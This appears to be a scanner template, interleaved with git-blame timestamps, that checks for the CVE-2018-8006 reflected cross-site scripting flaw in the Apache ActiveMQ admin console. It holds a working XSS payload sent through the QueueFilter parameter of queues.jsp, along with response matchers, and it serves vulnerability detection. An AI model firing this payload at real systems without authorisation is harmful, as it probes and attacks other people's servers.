2021-01-09 14:45:11 +00:00
id : CVE-2018-8006
info :
name : Apache ActiveMQ XSS
2021-04-06 06:46:11 +00:00
author : pdteam
2021-01-09 14:45:11 +00:00
severity : medium
2022-04-22 10:38:41 +00:00
description : An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter.
2021-09-10 11:26:40 +00:00
reference :
- http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210518135045/https://www.securityfocus.com/bid/105156
2021-09-10 11:26:40 +00:00
- https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E
- https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E
- https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E
- https://lists.apache.org/thread.html/03f91b1fb85686a848cee6b90112cf6059bd1b21b23bacaa11a962e1@%3Cdev.activemq.apache.org%3E
- https://lists.apache.org/thread.html/3f1e41bc9153936e065ca3094bd89ff8167ad2d39ac0b410f24382d2@%3Cgitbox.activemq.apache.org%3E
- https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E
- https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E
- https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2018-8006
cwe-id : CWE-79
tags : cve,cve2018,apache,activemq,xss
2021-01-09 14:45:11 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68'
matchers-condition : and
matchers :
- type : word
words :
- '"><script>alert("1")</script>'
- type : word
words :
- "/html"
part : header